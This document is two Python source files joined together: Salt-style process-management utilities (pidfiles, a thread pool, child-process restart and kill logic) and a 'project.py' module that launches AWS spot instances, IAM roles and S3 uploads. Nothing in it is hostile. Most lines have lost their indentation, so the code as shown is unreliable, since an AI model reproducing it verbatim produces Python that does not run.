if salt.utils.which('systemd-notify') and systemd_notify_call('--booted'):
return systemd_notify_call('--ready')
return False
if systemd.daemon.booted():
try:
return systemd.daemon.notify('READY=1')
except SystemError:
# Daemon was not started by systemd
pass
def set_pidfile(pidfile, user):
'''
Save the pidfile
'''
pdir = os.path.dirname(pidfile)
if not os.path.isdir(pdir) and pdir:
os.makedirs(pdir)
try:
with salt.utils.fopen(pidfile, 'w+') as ofile:
ofile.write(str(os.getpid()))
except IOError:
pass
log.debug(('Created pidfile: {0}').format(pidfile))
if salt.utils.is_windows():
return True
import pwd # after confirming not running Windows
#import grp
try:
pwnam = pwd.getpwnam(user)
uid = pwnam[2]
gid = pwnam[3]
#groups = [g.gr_gid for g in grp.getgrall() if user in g.gr_mem]
    except (KeyError, IndexError):
sys.stderr.write(
'Failed to set the pid to user: {0}. The user is not '
'available.\n'.format(
user
)
)
sys.exit(salt.defaults.exitcodes.EX_NOUSER)
if os.getuid() == uid:
# The current user already owns the pidfile. Return!
return
try:
os.chown(pidfile, uid, gid)
except OSError as err:
msg = (
'Failed to set the ownership of PID file {0} to user {1}.'.format(
pidfile, user
)
)
log.debug('{0} Traceback follows:\n'.format(msg), exc_info=True)
sys.stderr.write('{0}\n'.format(msg))
sys.exit(err.errno)
log.debug('Chowned pidfile: {0} to user: {1}'.format(pidfile, user))
def check_pidfile(pidfile):
'''
Determine if a pidfile has been written out
'''
return os.path.isfile(pidfile)
def get_pidfile(pidfile):
'''
Return the pid from a pidfile as an integer
'''
with salt.utils.fopen(pidfile) as pdf:
pid = pdf.read()
return int(pid)
def clean_proc(proc, wait_for_kill=10):
'''
Generic method for cleaning up multiprocessing procs
'''
# NoneType and other fun stuff need not apply
if not proc:
return
try:
waited = 0
while proc.is_alive():
proc.terminate()
waited += 1
time.sleep(0.1)
if proc.is_alive() and (waited >= wait_for_kill):
log.error(
'Process did not die with terminate(): {0}'.format(
proc.pid
)
)
os.kill(proc.pid, signal.SIGKILL)
except (AssertionError, AttributeError):
# Catch AssertionError when the proc is evaluated inside the child
# Catch AttributeError when the process dies between proc.is_alive()
# and proc.terminate() and turns into a NoneType
pass
def os_is_running(pid):
'''
Use OS facilities to determine if a process is running
'''
if isinstance(pid, six.string_types):
pid = int(pid)
if HAS_PSUTIL:
return psutil.pid_exists(pid)
else:
try:
os.kill(pid, 0) # SIG 0 is the "are you alive?" signal
return True
except OSError:
return False
class ThreadPool(object):
'''
This is a very VERY basic threadpool implementation
This was made instead of using multiprocessing ThreadPool because
we want to set max queue size and we want to daemonize threads (neither
is exposed in the stdlib version).
Since there isn't much use for this class as of right now this implementation
Only supports daemonized threads and will *not* return results
TODO: if this is found to be more generally useful it would be nice to pull
in the majority of code from upstream or from http://bit.ly/1wTeJtM
'''
def __init__(self,
num_threads=None,
queue_size=0):
# if no count passed, default to number of CPUs
if num_threads is None:
num_threads = multiprocessing.cpu_count()
self.num_threads = num_threads
# create a task queue of queue_size
self._job_queue = queue.Queue(queue_size)
self._workers = []
# create worker threads
for _ in range(num_threads):
thread = threading.Thread(target=self._thread_target)
thread.daemon = True
thread.start()
self._workers.append(thread)
# intentionally not called "apply_async" since we aren't keeping track of
# the return at all, if we want to make this API compatible with multiprocessing
# threadpool we can in the future, and we won't have to worry about name collision
def fire_async(self, func, args=None, kwargs=None):
if args is None:
args = []
if kwargs is None:
kwargs = {}
try:
self._job_queue.put_nowait((func, args, kwargs))
return True
except queue.Full:
return False
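    # Worker loop: pull (func, args, kwargs) jobs off the queue and execute them until the process exits.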
def _thread_target(self):
while True:
# 1s timeout so that if the parent dies this thread will die within 1s
try:
try:
func, args, kwargs = self._job_queue.get(timeout=1)
self._job_queue.task_done() # Mark the task as done once we get it
except queue.Empty:
continue
except AttributeError:
                # During shutdown, `queue` may not have an `Empty` attribute. Thus,
                # we have to catch a possible exception from our exception handler in
                # order to avoid an unclean shutdown. Le sigh.
continue
try:
log.debug('ThreadPool executing func: {0} with args:{1}'
' kwargs{2}'.format(func, args, kwargs))
func(*args, **kwargs)
except Exception as err:
log.debug(err, exc_info=True)
class ProcessManager(object):
'''
A class which will manage processes that should be running
'''
def __init__(self, name=None, wait_for_kill=1):
# pid -> {tgt: foo, Process: object, args: args, kwargs: kwargs}
self._process_map = {}
self.name = name
if self.name is None:
self.name = self.__class__.__name__
self.wait_for_kill = wait_for_kill
# store some pointers for the SIGTERM handler
self._pid = os.getpid()
self._sigterm_handler = signal.getsignal(signal.SIGTERM)
self._restart_processes = True
    def add_process(self, tgt, args=None, kwargs=None, name=None):
        '''
        Create a process from tgt with the given args + kwargs.
        This will determine whether tgt is a Process class; otherwise it
        assumes it is a function.
        '''
if args is None:
args = []
if kwargs is None:
kwargs = {}
if salt.utils.is_windows():
            # Need to ensure that 'log_queue' is correctly transferred to
# processes that inherit from 'MultiprocessingProcess'.
if type(MultiprocessingProcess) is type(tgt) and (
issubclass(tgt, MultiprocessingProcess)):
need_log_queue = True
else:
need_log_queue = False
if need_log_queue and 'log_queue' not in kwargs:
if hasattr(self, 'log_queue'):
kwargs['log_queue'] = self.log_queue
else:
kwargs['log_queue'] = (
salt.log.setup.get_multiprocessing_logging_queue())
# create a nicer name for the debug log
if name is None:
if isinstance(tgt, types.FunctionType):
name = '{0}.{1}'.format(
tgt.__module__,
tgt.__name__,
)
else:
name = '{0}{1}.{2}'.format(
tgt.__module__,
'.{0}'.format(tgt.__class__) if str(tgt.__class__) != "<type 'type'>" else '',
tgt.__name__,
)
if type(multiprocessing.Process) is type(tgt) and issubclass(tgt, multiprocessing.Process):
process = tgt(*args, **kwargs)
else:
process = multiprocessing.Process(target=tgt, args=args, kwargs=kwargs, name=name)
if isinstance(process, SignalHandlingMultiprocessingProcess):
with default_signals(signal.SIGINT, signal.SIGTERM):
process.start()
else:
process.start()
log.debug("Started '{0}' with pid {1}".format(name, process.pid))
self._process_map[process.pid] = {'tgt': tgt,
'args': args,
'kwargs': kwargs,
'Process': process}
return process
def restart_process(self, pid):
'''
Create new process (assuming this one is dead), then remove the old one
'''
if self._restart_processes is False:
return
log.info('Process {0} ({1}) died with exit status {2},'
' restarting...'.format(self._process_map[pid]['tgt'],
pid,
self._process_map[pid]['Process'].exitcode))
# don't block, the process is already dead
self._process_map[pid]['Process'].join(1)
self.add_process(self._process_map[pid]['tgt'],
self._process_map[pid]['args'],
self._process_map[pid]['kwargs'])
del self._process_map[pid]
def stop_restarting(self):
self._restart_processes = False
def send_signal_to_processes(self, signal_):
if (salt.utils.is_windows() and
signal_ in (signal.SIGTERM, signal.SIGINT)):
# On Windows, the subprocesses automatically have their signal
# handlers invoked. If you send one of these signals while the
# signal handler is running, it will kill the process where it
# is currently running and the signal handler will not finish.
# This will also break the process tree: children of killed
# children will become parentless and not findable when trying
# to kill the process tree (they don't inherit their parent's
# parent). Hence the 'MWorker' processes would be left over if
# the 'ReqServer' process is killed this way since 'taskkill'
# with the tree option will not be able to find them.
return
for pid in six.iterkeys(self._process_map.copy()):
try:
os.kill(pid, signal_)
except OSError as exc:
if exc.errno not in (errno.ESRCH, errno.EACCES):
# If it's not a "No such process" error, raise it
raise
# Otherwise, it's a dead process, remove it from the process map
del self._process_map[pid]
@gen.coroutine
def run(self, async=False):
'''
Load and start all available api modules
'''
log.debug('Process Manager starting!')
salt.utils.appendproctitle(self.name)
# make sure to kill the subprocesses if the parent is killed
if signal.getsignal(signal.SIGTERM) is signal.SIG_DFL:
# There are no SIGTERM handlers installed, install ours
signal.signal(signal.SIGTERM, self.kill_children)
if signal.getsignal(signal.SIGINT) is signal.SIG_DFL:
# There are no SIGINT handlers installed, install ours
signal.signal(signal.SIGINT, self.kill_children)
while True:
log.trace('Process manager iteration')
try:
# in case someone died while we were waiting...
self.check_children()
# The event-based subprocesses management code was removed from here
# because os.wait() conflicts with the subprocesses management logic
# implemented in `multiprocessing` package. See #35480 for details.
if async:
yield gen.sleep(10)
else:
time.sleep(10)
if len(self._process_map) == 0:
break
# OSError is raised if a signal handler is called (SIGTERM) during os.wait
except OSError:
break
except IOError as exc:
# IOError with errno of EINTR (4) may be raised
# when using time.sleep() on Windows.
if exc.errno != errno.EINTR:
raise
break
def check_children(self):
'''
Check the children once
'''
if self._restart_processes is True:
            for pid, mapping in six.iteritems(self._process_map.copy()):
if not mapping['Process'].is_alive():
log.trace('Process restart of {0}'.format(pid))
self.restart_process(pid)
def kill_children(self, *args, **kwargs):
'''
Kill all of the children
'''
        # first, ignore these signals so this handler is not run a second time
signal.signal(signal.SIGTERM, signal.SIG_IGN)
signal.signal(signal.SIGINT, signal.SIG_IGN)
# check that this is the correct process, children inherit this
# handler, if we are in a child lets just run the original handler
if os.getpid() != self._pid:
if callable(self._sigterm_handler):
return self._sigterm_handler(*args)
elif self._sigterm_handler is not None:
return signal.default_int_handler(signal.SIGTERM)(*args)
else:
return
if salt.utils.is_windows():
if multiprocessing.current_process().name != 'MainProcess':
# Since the main process will kill subprocesses by tree,
# no need to do anything in the subprocesses.
# Sometimes, when both a subprocess and the main process
# call 'taskkill', it will leave a 'taskkill' zombie process.
# We want to avoid this.
return
with salt.utils.fopen(os.devnull, 'wb') as devnull:
for pid, p_map in six.iteritems(self._process_map):
# On Windows, we need to explicitly terminate sub-processes
# because the processes don't have a sigterm handler.
subprocess.call(
['taskkill', '/F', '/T', '/PID', str(pid)],
stdout=devnull, stderr=devnull
)
p_map['Process'].terminate()
else:
for pid, p_map in six.iteritems(self._process_map.copy()):
log.trace('Terminating pid {0}: {1}'.format(pid, p_map['Process']))
if args:
# escalate the signal to the process
try:
os.kill(pid, args[0])
except OSError:
pass
try:
p_map['Process'].terminate()
except OSError as exc:
if exc.errno not in (errno.ESRCH, errno.EACCES):
raise
if not p_map['Process'].is_alive():
try:
del self._process_map[pid]
except KeyError:
# Race condition
pass
end_time = time.time() + self.wait_for_kill # when to die
log.trace('Waiting to kill process manager children')
while self._process_map and time.time() < end_time:
for pid, p_map in six.iteritems(self._process_map.copy()):
log.trace('Joining pid {0}: {1}'.format(pid, p_map['Process']))
p_map['Process'].join(0)
if not p_map['Process'].is_alive():
# The process is no longer alive, remove it from the process map dictionary
try:
del self._process_map[pid]
except KeyError:
# This is a race condition if a signal was passed to all children
pass
# if any managed processes still remain to be handled, let's kill them
kill_iterations = 2
while kill_iterations >= 0:
kill_iterations -= 1
for pid, p_map in six.iteritems(self._process_map.copy()):
if not p_map['Process'].is_alive():
# The process is no longer alive, remove it from the process map dictionary
try:
del self._process_map[pid]
except KeyError:
# This is a race condition if a signal was passed to all children
pass
continue
log.trace('Killing pid {0}: {1}'.format(pid, p_map['Process']))
try:
os.kill(pid, signal.SIGKILL)
except OSError as exc:
log.exception(exc)
# in case the process has since decided to die, os.kill returns OSError
if not p_map['Process'].is_alive():
# The process is no longer alive, remove it from the process map dictionary
try:
del self._process_map[pid]
except KeyError:
# This is a race condition if a signal was passed to all children
pass
if self._process_map:
# Some processes disrespected the KILL signal!!!!
available_retries = kwargs.get('retry', 3)
if available_retries >= 0:
log.info(
'Some processes failed to respect the KILL signal: %s',
'; '.join(
'Process: {0} (Pid: {1})'.format(v['Process'], k) for
(k, v) in self._process_map.items()
)
)
log.info('kill_children retries left: %s', available_retries)
kwargs['retry'] = available_retries - 1
return self.kill_children(*args, **kwargs)
else:
log.warning(
'Failed to kill the following processes: %s',
'; '.join(
'Process: {0} (Pid: {1})'.format(v['Process'], k) for
(k, v) in self._process_map.items()
)
)
log.warning(
'Salt will either fail to terminate now or leave some '
'zombie processes behind'
)
class MultiprocessingProcess(multiprocessing.Process, NewStyleClassMixIn):
def __new__(cls, *args, **kwargs):
instance = super(MultiprocessingProcess, cls).__new__(cls)
# Patch the run method at runtime because decorating the run method
        # with a function of similar behavior would be ignored once this
        # class's run method is overridden.
instance._original_run = instance.run
instance.run = instance._run
return instance
def __init__(self, *args, **kwargs):
if (salt.utils.is_windows() and
not hasattr(self, '_is_child') and
self.__setstate__.__code__ is
MultiprocessingProcess.__setstate__.__code__):
# On Windows, if a derived class hasn't defined __setstate__, that
# means the 'MultiprocessingProcess' version will be used. For this
# version, save a copy of the args and kwargs to use with its
# __setstate__ and __getstate__.
# We do this so that __init__ will be invoked on Windows in the
# child process so that a register_after_fork() equivalent will
# work on Windows. Note that this will only work if the derived
# class uses the exact same args and kwargs as this class. Hence
# this will also work for 'SignalHandlingMultiprocessingProcess'.
# However, many derived classes take params that they don't pass
# down (eg opts). Those classes need to override __setstate__ and
# __getstate__ themselves.
self._args_for_getstate = copy.copy(args)
self._kwargs_for_getstate = copy.copy(kwargs)
self.log_queue = kwargs.pop('log_queue', None)
if self.log_queue is None:
self.log_queue = salt.log.setup.get_multiprocessing_logging_queue()
else:
# Set the logging queue so that it can be retrieved later with
# salt.log.setup.get_multiprocessing_logging_queue().
salt.log.setup.set_multiprocessing_logging_queue(self.log_queue)
# Call __init__ from 'multiprocessing.Process' only after removing
# 'log_queue' from kwargs.
super(MultiprocessingProcess, self).__init__(*args, **kwargs)
if salt.utils.is_windows():
# On Windows, the multiprocessing.Process object is reinitialized
# in the child process via the constructor. Due to this, methods
# such as ident() and is_alive() won't work properly. So we use
# our own creation '_is_child' for this purpose.
if hasattr(self, '_is_child'):
# On Windows, no need to call register_after_fork().
# register_after_fork() would only work on Windows if called
# from the child process anyway. Since we know this is the
# child process, call __setup_process_logging() directly.
self.__setup_process_logging()
multiprocessing.util.Finalize(
self,
salt.log.setup.shutdown_multiprocessing_logging,
exitpriority=16
)
else:
multiprocessing.util.register_after_fork(
self,
MultiprocessingProcess.__setup_process_logging
)
multiprocessing.util.Finalize(
self,
salt.log.setup.shutdown_multiprocessing_logging,
exitpriority=16
)
# __setstate__ and __getstate__ are only used on Windows.
# We do this so that __init__ will be invoked on Windows in the child
# process so that a register_after_fork() equivalent will work on Windows.
def __setstate__(self, state):
self._is_child = True
args = state['args']
kwargs = state['kwargs']
# This will invoke __init__ of the most derived class.
self.__init__(*args, **kwargs)
def __getstate__(self):
args = self._args_for_getstate
kwargs = self._kwargs_for_getstate
if 'log_queue' not in kwargs:
kwargs['log_queue'] = self.log_queue
# Remove the version of these in the parent process since
# they are no longer needed.
del self._args_for_getstate
del self._kwargs_for_getstate
return {'args': args,
'kwargs': kwargs}
def __setup_process_logging(self):
salt.log.setup.setup_multiprocessing_logging(self.log_queue)
def _run(self):
try:
return self._original_run()
except SystemExit:
# These are handled by multiprocessing.Process._bootstrap()
raise
except Exception as exc:
log.error(
'An un-handled exception from the multiprocessing process '
'\'%s\' was caught:\n', self.name, exc_info=True)
# Re-raise the exception. multiprocessing.Process will write it to
# sys.stderr and set the proper exitcode and we have already logged
# it above.
raise
class SignalHandlingMultiprocessingProcess(MultiprocessingProcess):
def __init__(self, *args, **kwargs):
super(SignalHandlingMultiprocessingProcess, self).__init__(*args, **kwargs)
if salt.utils.is_windows():
if hasattr(self, '_is_child'):
# On Windows, no need to call register_after_fork().
# register_after_fork() would only work on Windows if called
# from the child process anyway. Since we know this is the
# child process, call __setup_signals() directly.
self.__setup_signals()
else:
multiprocessing.util.register_after_fork(
self,
SignalHandlingMultiprocessingProcess.__setup_signals
)
def __setup_signals(self):
signal.signal(signal.SIGINT, self._handle_signals)
signal.signal(signal.SIGTERM, self._handle_signals)
def _handle_signals(self, signum, sigframe):
signal.signal(signal.SIGTERM, signal.SIG_IGN)
signal.signal(signal.SIGINT, signal.SIG_IGN)
msg = '{0} received a '.format(self.__class__.__name__)
if signum == signal.SIGINT:
msg += 'SIGINT'
elif signum == signal.SIGTERM:
msg += 'SIGTERM'
msg += '. Exiting'
log.debug(msg)
if HAS_PSUTIL:
process = psutil.Process(self.pid)
if hasattr(process, 'children'):
for child in process.children(recursive=True):
if child.is_running():
child.terminate()
sys.exit(salt.defaults.exitcodes.EX_OK)
def start(self):
with default_signals(signal.SIGINT, signal.SIGTERM):
super(SignalHandlingMultiprocessingProcess, self).start()
@contextlib.contextmanager
def default_signals(*signals):
old_signals = {}
for signum in signals:
try:
            old_signals[signum] = signal.getsignal(signum)
            signal.signal(signum, signal.SIG_DFL)
except ValueError as exc:
# This happens when a netapi module attempts to run a function
# using wheel_async, because the process trying to register signals
# will not be the main PID.
log.trace(
'Failed to register signal for signum %d: %s',
signum, exc
)
# Do whatever is needed with the reset signals
yield
# Restore signals
for signum in old_signals:
signal.signal(signum, old_signals[signum])
del old_signals
|
project.py
|
import os
import time
import logging
import threading
import numpy as np
import pandas as pd
from datetime import datetime
from typing import Optional, List, Dict
from doppel.aws.ec2 import Ec2Client, Ec2
from doppel.aws.s3 import S3Bucket, S3Client
from doppel.aws.iam import IamClient, Policy
from doppel.ssh import SshSession
from doppel.utils import zip_dir, get_module_path
from doppel.core.context import DoppelContext
logging.getLogger('botocore.credentials').setLevel(logging.WARNING)
logging.getLogger('retry.api').setLevel(logging.ERROR)
logging.getLogger('paramiko.transport').setLevel(logging.WARNING)
logger = logging.getLogger('doppel')
KEY = 'doppel'
MAX_INSTANCES = 100
class DoppelPackage:
def __init__(self, path):
self.path = path
self.exists = os.path.exists(path)
self.name = os.path.split(path)[1]
self.is_dir = os.path.isdir(path)
self.has_setup = self.is_dir and os.path.exists(os.path.join(path, 'setup.py'))
self.add_to_pythonpath = self.is_dir and not self.has_setup
def validate(self):
if not self.exists:
            raise ValueError('Package path {} does not exist.'.format(self.path))
elif not self.is_dir:
raise ValueError('Package path {} should be a directory.'.format(self.path))
elif self.has_setup:
logger.info('Package {} will be pip installed using setup.py'.format(self.name))
else:
logger.info('Package {} will be added to python path'.format(self.name))
class DoppelProject:
"""
    Object to create and manage a computation project deployed on AWS EC2 instances.
Once initialized, the project creates a dedicated bucket on AWS S3.
Parameters
----------
name : string
The project name, used to name the S3 bucket.
src : string, default=None
Python code snippet to directly execute on EC2 instances. Cannot be used with path.
path : string, default=None
Path to a python file or a project directory, to run on EC2 instances. Cannot be used with src.
entry_point : string, default=None
Python entry point to execute when path is passed as a directory. If path points to a python project with a
setup.py, the entry point should be of the form -m module.module, instead of module/module.py
requirements : list of string, default=None
List of dependencies to install on EC2 instances prior to running the code. Should not be passed when
path is a project with a setup.py (and a requirements.txt).
packages : list of string, default=None
List of packages local path to upload and install on EC2 instances prior to running the code.
env_vars : List of string, default=None
List of environment variables to set on EC2 instances.
python : string, default=None
Python version to use when creating virtual environment on EC2 instances. When None, the latest version is used.
n_instances : integer, default=None
Number of instances to start on AWS. When None, calculated using duration and budget if possible, else default
to 1.
duration : float, default=None
Duration (in hours) during which instances should run. When None, calculated using n_instances and budget if
        possible, else run indefinitely.
budget : float, default=None
Budget (in your AWS profile currency) allocated to the project. When None, calculated using n_instances and
duration if possible, else no budget limit is defined.
min_memory : float, default=None
Minimum RAM memory, in Gb, for the EC2 instances to have. If not defined, no lower limit is applied.
min_cpu : integer, default=None
Minimum number of vCPUs for the EC2 instances to have. If not defined, no lower limit is applied.
min_gpu : integer, default=None
Minimum number of GPUs for the EC2 instance to have. If not defined, no lower limit is applied.
context : DoppelContext, default=None
When starting new instances, the project will copy data defined on the context to each instance. Those data
can then be accessed using context.data_path(<key>), which will return the local path when the code is running
locally, or the remote path when the code is running on AWS.
key_path : string, default=None
Path to an AWS key pair pem file to use instead of creating a new key pair. The file should be of the form
<key_pair.pem>, where <key_pair> is the name of the key pair already existing on AWS.
Examples
--------
>>> context = DoppelContext() \
>>> .add_data(key='train', bucket='my-project-data', source=r'C:\data\project\train.csv') \
>>> .add_data(key='test', bucket='my-project-data', source=r'C:\data\project\test.csv')
>>> context.upload_data()
>>>
>>> project = DoppelProject(
>>> name='project-run-1',
>>> path=r'C:\app\project',
>>> entry_point='-m project.run',
>>> n_instances=10, budget=20,
>>> min_memory=16, min_cpu=8,
>>> context=context
>>> )
>>> project.start()
>>> project.monitore()
"""
def __init__(
self,
name: str,
src: Optional[str] = None,
path: Optional[str] = None,
entry_point: Optional[str] = None,
requirements: Optional[List[str]] = None,
packages: Optional[List[str]] = None,
env_vars: Optional[Dict[str, str]] = None,
python: Optional[str] = None,
n_instances: Optional[int] = None,
duration: Optional[float] = None,
budget: Optional[float] = None,
min_memory: Optional[float] = None,
min_cpu: Optional[int] = None,
min_gpu: Optional[int] = None,
context: Optional[DoppelContext] = None,
key_path: Optional[str] = None,
commands: Optional[List[str]] = None
):
self.name = self._format_name(name)
self.arn = self._get_arn(name)
self.src = src
self.path = path
self.entry_point = entry_point
self.packages = packages
self.requirements = requirements
self.env_vars = env_vars
self.python = python
self.n_instances = n_instances
self.duration = duration
self.budget = budget
self.min_memory = min_memory
self.min_cpu = min_cpu
self.min_gpu = min_gpu
self.context = context
self.key_path = key_path
self.commands = commands
self.file_path = path if path is not None and os.path.isfile(path) else None
self.dir_path = path if path is not None and os.path.isdir(path) else None
self.package = None
if self.dir_path is not None:
self.package = DoppelPackage(path)
self.doppel_packages = None
if self.packages is not None:
self.doppel_packages = [DoppelPackage(path) for path in self.packages]
# Project details
self.image_id = None
self.platform_details = None
self.instance_type = None
self.instance_availability_zone = None
self.instance_vcpu = None
self.instance_memory = None
self.instance_price = None
# Key pair
if self.key_path is None:
self.key_name = 'key-pair-{}'.format(self.arn)
else:
self.key_name = os.path.basename(self.key_path)[:-4]
self.key_id = None
self.key_material = None
# Security group
self.group_name = 'group-{}'.format(self.arn)
self.group_id = None
# IAM role and instance profile
self.role_name = 'role-{}'.format(self.arn)
self.role_id = None
self.role_arn = None
self.instance_profile_name = 'profile-{}'.format(self.arn)
self.instance_profile_arn = None
# Boto clients
self.ec2: Ec2Client = None
self.bucket: S3Bucket = None
self.iam: IamClient = None
self.initialized = False
self.start_time = None
self.terminated = False
self._init_aws_clients()
@staticmethod
def _format_name(name):
name = ''.join([c if c.isalnum() else '-' for c in name.lower()])
name = name.strip('-')
return name
@staticmethod
def _get_arn(name):
return '{}-{}'.format(KEY, name)
def _validate(self):
if self.src is None and self.path is None:
raise ValueError('You need to provide either src or path.')
elif self.src is not None and self.path is not None:
            raise ValueError('You can only provide one of src and path.')
elif self.src is not None and self.entry_point is not None:
raise ValueError('entry_point not accepted when providing src.')
elif self.path is not None and not os.path.exists(self.path):
            raise FileNotFoundError('path does not exist.')
elif self.file_path is not None and self.entry_point is not None:
raise ValueError('entry_point not accepted when providing a file path.')
elif self.dir_path is not None and self.entry_point is None:
raise ValueError('entry_point needed when providing a directory path.')
# Validate package
if self.package is not None:
self.package.validate()
if self.package.has_setup and self.requirements is not None:
raise ValueError('You should not provide requirements when your path has a setup.py')
# Validate packages
if self.packages is not None:
for package in self.doppel_packages:
package.validate()
def save(self):
config = dict(
name=self.name,
src=self.src,
path=self.path,
entry_point=self.entry_point,
packages=self.packages,
requirements=self.requirements,
env_vars=self.env_vars,
python=self.python,
n_instances=self.n_instances,
key_path=self.key_path,
duration=self.duration,
budget=self.budget,
min_memory=self.min_memory,
min_cpu=self.min_cpu,
min_gpu=self.min_gpu,
context=self.context.data if self.context is not None else None
)
status = dict(
name=self.name,
status=self.get_status(),
start_time=self.start_time
)
self.bucket.save(config, 'doppel.config')
self.bucket.save(status, 'doppel.status')
if self.key_material is not None:
self.bucket.save(self.key_material, 'key.pem')
def get_status(self):
status = 'initialized'
if self.terminated:
status = 'terminated'
elif self.start_time is not None:
status = 'running'
return status
@classmethod
def exists(cls, name):
name = cls._format_name(name)
arn = cls._get_arn(name)
return S3Client().bucket_exists(arn)
@classmethod
def load(cls, name):
name = cls._format_name(name)
arn = cls._get_arn(name)
if not S3Client().bucket_exists(arn):
            raise ValueError('Project {} does not exist.'.format(name))
bucket = S3Bucket(arn)
config = bucket.load_json('doppel.config')
config['context'] = DoppelContext(config['context'])
project = cls(**config)
status = bucket.load_json('doppel.status')
if status['start_time'] is not None:
project.start_time = datetime.fromisoformat(status['start_time'])
        project.terminated = (status['status'] == 'terminated')
if bucket.exists('key.pem'):
project.key_material = bucket.load('key.pem')
return project
def _init_aws_clients(self):
self.ec2 = Ec2Client()
self.bucket = S3Bucket(self.arn)
self.bucket.block_public_access()
self.iam = IamClient()
def init(self):
self._init_image()
self._init_instance()
self._init_project()
self.initialized = True
def _init_image(self):
image = self.ec2.get_latest_deep_learning_image()
self.image_id = image[Ec2.IMAGE_ID]
self.platform_details = image[Ec2.PLATFORM_DETAILS]
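    # Pick the cheapest spot instance type that satisfies the memory/CPU/GPU requirements.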
def _init_instance(self):
instances = self.ec2.get_instance_types()
instances = instances[instances[Ec2.SUPPORTED_USAGES].apply(lambda x: 'spot' in x)]
instances[Ec2.MEMORY_INFO] = np.round(instances[Ec2.MEMORY_INFO] / 1024)
if self.min_memory is not None:
instances = instances[instances[Ec2.MEMORY_INFO] >= self.min_memory]
if self.min_cpu is not None:
instances = instances[instances[Ec2.VCPU_INFO] >= self.min_cpu]
if self.min_gpu is not None:
def valid_gpu_instance(gpu):
if pd.isnull(gpu):
return False
return gpu[0]['Count'] >= self.min_gpu
instances = instances[instances[Ec2.GPU_INFO].apply(valid_gpu_instance)]
prices = self.ec2.get_spot_prices(products_description=self.platform_details)
instances = pd.merge(instances, prices, on=Ec2.INSTANCE_TYPE)
instances = instances.sort_values(Ec2.SPOT_PRICE)
if len(instances) == 0:
raise ValueError('No instance matches minimum requirements')
instance = instances.iloc[[0]].to_dict(orient='records')[0]
self.instance_type = instance[Ec2.INSTANCE_TYPE]
self.instance_availability_zone = instance[Ec2.AVAILABILITY_ZONE]
self.instance_vcpu = instance[Ec2.VCPU_INFO]
self.instance_memory = instance[Ec2.MEMORY_INFO]
self.instance_price = instance[Ec2.SPOT_PRICE]
logger.info('Selecting {} instance in {} [{:.0f} CPUs, {:.1f}Go, {:.4f}€/h]'.format(
self.instance_type,
self.instance_availability_zone,
self.instance_vcpu,
self.instance_memory,
self.instance_price))
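    # Derive whichever of n_instances / duration / budget is missing from the values that were provided.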
def _init_project(self):
n_none = (self.n_instances is None) + (self.duration is None) + (self.budget is None)
if n_none == 1:
if self.n_instances is None:
self._compute_n_instances()
elif self.duration is None:
self._compute_duration()
elif self.budget is None:
self._compute_budget()
elif n_none == 2:
if self.n_instances is not None:
pass
elif self.duration is not None:
self.n_instances = 1
self._compute_budget()
elif self.budget is not None:
self.n_instances = 1
self._compute_duration()
elif n_none == 3:
self.n_instances = 1
if self.n_instances > MAX_INSTANCES:
            raise ValueError('Reached maximum of {} instances. Increase duration or reduce budget.'.format(MAX_INSTANCES))
if self.duration is None:
            logger.info('Running {} instances indefinitely, for {}€/hour'.format(
self.n_instances, self.n_instances * self.instance_price))
else:
logger.info('Running {} instances for {:.1f} hours, for {:.2f}€'.format(
self.n_instances, self.duration, self.budget))
def _compute_n_instances(self):
        self.n_instances = int(np.round(self.budget / (self.duration * self.instance_price), 0))
self._compute_duration()
def _compute_duration(self):
self.duration = self.budget / (self.n_instances * self.instance_price)
def _compute_budget(self):
self.budget = self.n_instances * self.duration * self.instance_price
def start(self):
if not self.initialized:
self.init()
self._validate()
# We save the project first thing to be able to easily destroy it if something goes wrong before the next save
self.save()
self.terminated = False
self.start_time = datetime.now()
self._create_aws_resources()
self._push_code_to_s3()
self.save()
instance_dns = self._start_instances(self.n_instances)
self._configure_instances(instance_dns)
def _create_aws_resources(self):
if self.key_path is None:
self._create_key_pair()
else:
self._load_key_pair()
self._create_security_group()
self._create_role()
self._create_instance_profile()
def _load_key_pair(self):
with open(self.key_path) as stream:
self.key_material = stream.read()
def _create_key_pair(self):
key = self.ec2.create_key_pair(self.key_name, tag=(KEY, self.name))
self.key_id = key['KeyPairId']
self.key_material = key['KeyMaterial']
def _create_security_group(self):
group = self.ec2.create_security_group(
self.group_name, 'Security for {} {}'.format(KEY, self.name),
tag=(KEY, self.name)
)
self.group_id = group['GroupId']
self.ec2.add_ssh_access_to_my_ip_to_security_group(self.group_id)
def _create_role(self):
role = self.iam.create_role(self.role_name, service='ec2',
description='Role for {} {}'.format(KEY, self.name),
tag=(KEY, self.name))
self.role_id = role['RoleId']
self.role_arn = role['Arn']
self.iam.attach_role_policy(self.role_name, Policy.EC2)
self.iam.attach_role_policy(self.role_name, Policy.S3)
self.iam.attach_role_policy(self.role_name, Policy.IAM)
self.iam.attach_role_policy(self.role_name, Policy.CLOUD_WATCH)
def _create_instance_profile(self):
profile = self.iam.create_instance_profile(self.instance_profile_name, self.role_name)
self.instance_profile_arn = profile['Arn']
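    # Upload the source code, extra packages, requirements and awslogs configuration to the project S3 bucket.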
def _push_code_to_s3(self):
if self.src is not None:
self.bucket.save(self.src, 'main.py')
elif self.file_path is not None:
self.bucket.upload(self.file_path, 'main.py')
elif self.dir_path is not None:
zip = zip_dir(self.dir_path)
self.bucket.save(zip, 'src.zip')
if self.packages is not None:
for package in self.doppel_packages:
zip = zip_dir(package.path)
self.bucket.save(zip, '{}.zip'.format(package.name))
if self.requirements is not None:
self.bucket.save('\n'.join(self.requirements), 'requirements.txt')
with open(os.path.join(get_module_path(), 'aws/awslogs/awscli.conf')) as file:
aws_cli = file.read()
aws_cli = aws_cli.format(region=self.ec2.region)
with open(os.path.join(get_module_path(), 'aws/awslogs/awslogs.conf')) as file:
aws_logs = file.read()
log_group = '{}-{}'.format(KEY, self.name)
log_group_name = log_group
aws_logs = aws_logs.format(log_group=log_group, log_group_name=log_group_name)
self.bucket.save(aws_cli, 'awscli.conf')
self.bucket.save(aws_logs, 'awslogs.conf')
@staticmethod
def get_package_name(path, i):
name = os.path.split(path)[1]
if name == '':
name = 'package'
name = '{}-{}'.format(name, i)
return name
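    # Request n spot instances tagged with the project name and return their public DNS names.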
def _start_instances(self, n):
instances = self.ec2.run_spot_instances(
ami_id=self.image_id, instance_type=self.instance_type, availability_zone=self.instance_availability_zone,
key_name=self.key_name, group_name=self.group_name, instance_profile_arn=self.instance_profile_arn,
n_instances=n, tag=(KEY, self.name)
)
